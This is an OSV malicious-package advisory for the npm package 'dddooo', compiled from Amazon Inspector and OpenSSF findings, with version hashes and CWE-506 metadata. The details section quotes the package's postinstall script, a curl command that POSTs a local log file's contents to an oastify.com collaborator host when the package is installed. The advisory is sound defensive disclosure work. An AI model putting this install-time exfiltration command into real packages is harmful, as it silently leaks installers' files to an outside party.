MAL-2026-6460
See a problem?- Import Source
- https://github.com/ossf/malicious-packages/blob/main/osv/malicious/npm/dddooo/MAL-2026-6460.json
- JSON Data
- https://api.osv.dev/v1/vulns/MAL-2026-6460
- Published
- 2026-06-25T10:05:37Z
- Modified
- 2026-06-25T16:31:23.421890690Z
- Summary
- Malicious code in dddooo (npm)
- Details
-
-= Per source details. Do not edit below this line.=-
Source: amazon-inspector (31763ebf0ebdd35b636e728b408f41ff8852cddeb34db5e188dc17c8374c6948)
package.json declares a postinstall lifecycle script that runs automatically on
npm install:curl -X POST -d "$(cat /data/logs/monitor-2026-06-16.log)" http://3dhd6wwmusbh04m22igmzvb4hvnmblza.oastify.com/data. The script reads a file from the installer's filesystem and POSTs its contents over plain HTTP to an attacker-controlled Burp Collaborator (oastify.com) out-of-band interaction subdomain. The package presents itself as ahandy string utility functionslibrary, but has empty author/homepage/repository fields and includes a malformedtrunls -laekeyword — the library framing is a cover for the install-time exfiltration. No legitimate string-utility package needs to read system log paths or beacon to oastify.com on install.Source: ossf-package-analysis (99d97fdc7c59d1871a9f0771694688026d7ee92d4bc37cdd48a52db1d9055246)
The OpenSSF Package Analysis project identified 'dddooo' @ 1.0.2 (npm) as malicious.
It is considered malicious because:
The package communicates with a domain associated with malicious activity.
The package executes one or more commands associated with malicious behavior.
- Database specific
{ "malicious-packages-origins": [ { "versions": [ "1.0.2" ], "modified_time": "2026-06-25T10:05:37Z", "sha256": "99d97fdc7c59d1871a9f0771694688026d7ee92d4bc37cdd48a52db1d9055246", "source": "ossf-package-analysis", "import_time": "2026-06-25T10:28:39.723204683Z" }, { "versions": [ "1.0.2" ], "modified_time": "2026-06-25T16:09:42Z", "sha256": "554ebc4bc4d5915885da6d519c699c7b6c32cdafddd916bdbf9b0f4be039c706", "id": "IN-MAL-2026-007510", "source": "amazon-inspector", "import_time": "2026-06-25T16:23:39.842588817Z" }, { "versions": [ "1.0.1" ], "modified_time": "2026-06-25T16:09:46Z", "sha256": "29a1f6b05340c6c5543341f1eb014228ca636936f378ab147b03895c41639d92", "id": "IN-MAL-2026-007512", "source": "amazon-inspector", "import_time": "2026-06-25T16:23:39.973601337Z" }, { "versions": [ "1.0.0" ], "modified_time": "2026-06-25T16:09:44Z", "sha256": "31763ebf0ebdd35b636e728b408f41ff8852cddeb34db5e188dc17c8374c6948", "id": "IN-MAL-2026-007511", "source": "amazon-inspector", "import_time": "2026-06-25T16:23:39.91871979Z" } ] }- References
- Credits
-
-
- Amazon Inspector - FINDER
-
- OpenSSF: Package Analysis - FINDER
-
Affected packages
npm / dddooo
Package
- Name
- dddooo
- View open source insights on deps.dev
- Purl
- pkg:npm/dddooo
Database specific
cwes
[
{
"cweId": "CWE-506",
"description": "The product contains code that appears to be malicious in nature.",
"name": "Embedded Malicious Code"
},
{
"cweId": "CWE-506",
"description": "The product contains code that appears to be malicious in nature.",
"name": "Embedded Malicious Code"
},
{
"cweId": "CWE-506",
"description": "The product contains code that appears to be malicious in nature.",
"name": "Embedded Malicious Code"
}
]
indicators
{
"package_integrity": [
{
"filename": "dddooo-1.0.2.tgz",
"hashes": {
"sha512_sri": "sha512-x7XDaYR5faRQgQu3DSSU+EREGZ56FlZSyz2SZ0x6S08jv36LbDyBhZYu7uhGHD4CpmnEgaNYA3Rz/FHiYSZb7w==",
"sha1": "281007f49d847ce0683109ef2cad27e4c5c48296"
}
}
],
"evidence_files": [
{
"path": "package.json",
"tlsh": "da01cb18c6345d3319c82b30bdab0642b112ae5709043c1977c3812c0faf7af50fe22d",
"sha256": "47e1d3585afcee791d7f32b2d6c976c2554577cd232b87311834c27db35167d9"
}
]
}
source
"https://github.com/ossf/malicious-packages/blob/main/osv/malicious/npm/dddooo/MAL-2026-6460.json"